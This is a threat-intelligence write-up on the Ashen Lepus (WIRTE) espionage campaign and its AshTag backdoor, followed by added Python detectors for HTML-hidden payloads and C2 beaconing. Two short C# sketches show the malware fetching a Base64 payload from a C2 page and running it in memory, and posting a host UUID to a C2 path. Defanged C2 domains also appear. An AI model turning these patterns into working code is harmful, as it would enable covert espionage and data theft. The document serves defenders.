A Hamas-affiliated hacking group, identified as Ashen Lepus and also known as WIRTE, has been actively conducting a sophisticated espionage campaign targeting governmental and diplomatic entities across the Middle East. This operation utilizes highly realistic Arabic-language diplomatic lures, referencing regional politics and security discussions, to manipulate officials into opening malicious documents. The objective of this campaign is to illicitly obtain sensitive diplomatic information and establish persistent access to compromised systems.
The group’s tactics involve distributing seemingly innocuous PDF files that prompt victims to download RAR archives. These archives contain a fake document executable, a malicious loader, and a decoy PDF. Upon execution of the apparent document, a hidden malicious DLL is side-loaded, initiating the infection chain, while a harmless PDF is displayed to the user, aiming to reduce suspicion. This detailed analysis of the Ashen Lepus activity and their new AshTag malware was published by Palo Alto Networks security researchers.
Ashen Lepus Employs New AshTag Malware for Persistent Espionage
The Ashen Lepus threat actor has introduced a new malware suite named AshTag, specifically designed for stealthy intelligence gathering. This campaign has demonstrated continued operation even amidst recent regional conflicts and subsequent ceasefires, highlighting the group’s unwavering commitment to sustained intelligence collection rather than immediate disruption. The AshTag toolkit represents a significant evolution in the group’s capabilities, moving from previous methods to a more refined approach.
Palo Alto Networks researchers observed distinct changes in both the AshTag malware and its command-and-control (C2) infrastructure. The group is now obscuring its traffic by leveraging API-style subdomains of legitimate-looking websites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com. This contrasts with their previous practice of using dedicated attacker-owned domains. Additionally, payloads are executed directly in memory, minimizing forensic traces on disk and further enhancing stealth.
AshTag Infection Mechanism and Orchestrator Design
At the heart of the campaign is the AshTag malware itself, a modular .NET backdoor. It masquerades as a legitimate utility, VisualServer, but is engineered to facilitate file exfiltration, command execution, and the in-memory loading of additional tools. The infection chain is structured in multiple stages, commencing with an initial loader named AshenLoader, followed by a secondary stager called AshenStager, and culminating in an orchestration component, AshenOrchestrator, which manages all subsequent modules.
AshenLoader initiates communication with the C2 server, transmitting basic host information and retrieving AshenStager, which is cleverly hidden within HTML content via custom header tags. AshenStager then fetches another HTML page, from which it extracts a Base64-encoded payload concealed within article tags. This payload contains the crucial AshenOrchestrator component, which dictates the subsequent actions of the malware.
A simplified representation of this parsing logic demonstrates how the malware extracts and executes embedded data:
```csharp
// Fetch the attacker-controlled page and pull the Base64 payload out of the <article> element.
// The pattern below is reconstructed from the description above (payload inside article tags,
// captured in a group named "data"); the literal regex did not survive extraction.
var html = GetHtml(c2Url);
var match = Regex.Match(html, "<article>(?<data>[A-Za-z0-9+/=]+)</article>");
var b64 = match.Groups["data"].Value;
var payload = Convert.FromBase64String(b64);
ExecuteInMemory(payload);
```
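The same layout seen from the defender's side is a long Base64 run that forms the entire text of an `<article>` element or of a non-standard tag, which is something a proxy, sandbox or retro-hunt over cached pages can look for. The Python below is an added example, not code from the Palo Alto Networks report or from the malware: it scans an HTML body for such runs, decodes them strictly, and labels the result as a PE image, a JSON object (the shape the orchestrator configuration takes) or opaque bytes. The two sample pages and the payloads inside them are constructed for the demonstration, and the choice of `article` plus any tag outside a short list of common text-bearing tags as the wrappers worth reporting is an assumption, as is the 64-character minimum.

```python
import base64
import json
import re

# Tags that legitimately carry long text; a Base64 run inside one of these is not
# by itself suspicious. Anything else (article, or a custom tag) is treated as a
# hiding place worth reporting. This list is an assumption for the demonstration.
COMMON_TEXT_TAGS = {"p", "div", "span", "pre", "code", "td", "li", "textarea", "script", "style"}

# <tag ...>BASE64</tag>: an element whose entire text content is one Base64 run
# of at least 64 characters (the back-reference \1 requires the matching close tag).
TAG_BLOB_RE = re.compile(
    r"<([a-z][a-z0-9-]*)\b[^>]*>\s*([A-Za-z0-9+/]{64,}={0,2})\s*</\1>",
    re.I | re.S,
)


def decode_blob(b64: str):
    """Strict Base64 decode; returns None when the run is not valid Base64."""
    try:
        return base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None


def classify_payload(data: bytes) -> str:
    """Label decoded bytes: a PE image ("pe"), a JSON object ("json") or anything else ("opaque")."""
    if data[:2] == b"MZ":
        return "pe"
    try:
        if isinstance(json.loads(data.decode("utf-8")), dict):
            return "json"
    except (UnicodeDecodeError, ValueError):
        pass
    return "opaque"


def scan_html(html: str) -> list:
    """Return one finding per element that wraps a decodable Base64 run and looks like a carrier."""
    findings = []
    for m in TAG_BLOB_RE.finditer(html):
        tag = m.group(1).lower()
        data = decode_blob(m.group(2))
        if data is None:
            continue
        kind = classify_payload(data)
        unusual_wrapper = tag == "article" or tag not in COMMON_TEXT_TAGS
        if kind in ("pe", "json") or unusual_wrapper:
            findings.append({"tag": tag, "kind": kind, "size": len(data)})
    return findings


# --- constructed sample pages (not real C2 content) ---
CONFIG_JSON = json.dumps(
    {"c2": ["api.healthylifefeed[.]com"], "jitter": 20, "modules": {"SN": "/m/sn"}}
).encode()
FAKE_PE = b"MZ" + bytes(62)  # DOS-header magic followed by zero padding

MALICIOUS_HTML = f"""<html><head><title>Regional briefing</title>
<x-stage>{base64.b64encode(FAKE_PE).decode()}</x-stage></head>
<body><article>{base64.b64encode(CONFIG_JSON).decode()}</article></body></html>"""

BENIGN_HTML = """<html><head><title>Regional briefing</title></head>
<body><article><p>Ministry statement on the talks, published this morning.</p></article></body></html>"""

if __name__ == "__main__":
    for name, page in (("malicious", MALICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(name, scan_html(page))
```

The benign page produces no findings because ordinary article text contains spaces and punctuation and never forms a 64-character Base64 run; the strict decode (`validate=True`) and the content classification keep a stray key or hash in a `<pre>` block from being reported unless it decodes to a PE or a JSON object.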
Upon receiving its configuration, AshenOrchestrator decodes a Base64-encoded JSON object containing critical parameters such as C2 domains, module URLs, encryption keys, and jitter values used to randomize beacon timing. It establishes an AES key derived from specific parameters, which is then used to decrypt an XOR key. This decrypted XOR key is subsequently employed to decode another embedded payload. This next payload is also a Base64-encoded JSON object detailing the module’s class name (e.g., SN for system fingerprinting or SCT for screen capture) and its loading method. This method can instruct the orchestrator to save a module to disk, execute it as a .NET assembly, upload additional content, or inject code into memory.
One recovered module, designated SN, is responsible for host profiling. It performs simple WMI queries to gather system information and transmits a unique victim ID back to the attackers. This systematic profiling enables Ashen Lepus to prioritize high-value diplomatic targets, refining their espionage efforts. A rudimentary illustration of this module’s function is as follows:
```csharp
// Host fingerprint: read the firmware UUID via WMI and report it to the C2 as the victim ID.
var id = GetWmi("Win32_ComputerSystemProduct", "UUID");
PostToC2("/api/v2/register", id);
```
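On the network side, the registration request above and the jittered beaconing described in the configuration section give a defender two things to look for in proxy logs. The Python below is an added example, not code from the report or from the malware: it parses a simple proxy log, flags requests to the two C2 hosts named in this write-up or POSTs to the `/api/v2/register` path, and then looks for (source, host, path) sessions whose request gaps are regular enough to suggest automated polling while still allowing for the jitter AshTag adds. The log layout, the log lines, the four-request minimum and the 0.5 jitter-ratio threshold are all assumptions constructed for the demonstration.

```python
import re
import statistics
from datetime import datetime

# Hosts quoted in the write-up, kept defanged; refang() restores the dots for matching.
C2_HOSTS_DEFANGED = {"api.healthylifefeed[.]com", "auth.onlinefieldtech[.]com"}
REGISTER_PATH = "/api/v2/register"


def refang(host: str) -> str:
    return host.replace("[.]", ".")


KNOWN_C2 = {refang(h) for h in C2_HOSTS_DEFANGED}

# Assumed log layout: timestamp src-ip method host path status bytes
LINE_RE = re.compile(r"(\S+) (\S+) (GET|POST) (\S+) (\S+) (\d{3}) (\d+)")


def parse_log(text: str) -> list:
    rows = []
    for line in text.splitlines():
        m = LINE_RE.fullmatch(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        ts, src, method, host, path, status, size = m.groups()
        rows.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "src": src, "method": method, "host": host.lower(),
            "path": path, "status": int(status), "size": int(size),
        })
    return rows


def ioc_hits(rows: list) -> list:
    """Requests that touch a known C2 host or use the registration endpoint."""
    hits = []
    for r in rows:
        reasons = []
        if r["host"] in KNOWN_C2:
            reasons.append("known-c2-host")
        if r["method"] == "POST" and r["path"] == REGISTER_PATH:
            reasons.append("register-path")
        if reasons:
            hits.append((r["src"], r["host"], r["path"], reasons))
    return hits


def beacon_candidates(rows: list, min_requests: int = 4, max_jitter: float = 0.5) -> list:
    """Group requests by (src, host, path) and flag groups whose inter-request gaps are
    regular. Jitter ratio = population stdev / mean of the gaps; a beacon that randomises
    its sleep by a bounded percentage still lands well under the threshold."""
    groups = {}
    for r in rows:
        groups.setdefault((r["src"], r["host"], r["path"]), []).append(r["ts"])
    out = []
    for key, times in groups.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        ratio = statistics.pstdev(gaps) / mean
        if ratio <= max_jitter:
            out.append((key, round(mean), round(ratio, 2)))
    return out


# Constructed proxy log (synthetic, not from a real incident): one host registers once,
# then polls the same path roughly every five minutes; another host browses normally.
PROXY_LOG = """\
2025-06-03T09:00:00Z 10.1.4.22 POST api.healthylifefeed.com /api/v2/register 200 412
2025-06-03T09:00:00Z 10.1.4.22 GET api.healthylifefeed.com /news/latest 200 51233
2025-06-03T09:04:48Z 10.1.4.22 GET api.healthylifefeed.com /news/latest 200 51234
2025-06-03T09:10:19Z 10.1.4.22 GET api.healthylifefeed.com /news/latest 200 51233
2025-06-03T09:15:02Z 10.1.4.22 GET api.healthylifefeed.com /news/latest 200 51233
2025-06-03T09:01:10Z 10.1.4.23 GET www.example-news.org /world 200 80331
2025-06-03T09:31:44Z 10.1.4.23 GET www.example-news.org /sport 200 60102
"""

if __name__ == "__main__":
    rows = parse_log(PROXY_LOG)
    for hit in ioc_hits(rows):
        print("ioc", hit)
    for cand in beacon_candidates(rows):
        print("beacon", cand)
```

The indicator match is the cheap, high-confidence check; the cadence check is what remains useful once the group rotates to the next look-alike API subdomain, because it keys on behaviour rather than on the hostname. Tune `min_requests` and `max_jitter` against your own baseline before alerting on it.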
The intricate layering of loaders, HTML-embedded payloads, and modular .NET components underscores Ashen Lepus’s ongoing refinement of its tradecraft. The group maintains a simple yet flexible codebase, finely tuned for stealthy diplomatic espionage. The continued evolution of such threat actor tactics necessitates constant vigilance and adaptation from cybersecurity professionals to defend against persistent information-gathering operations.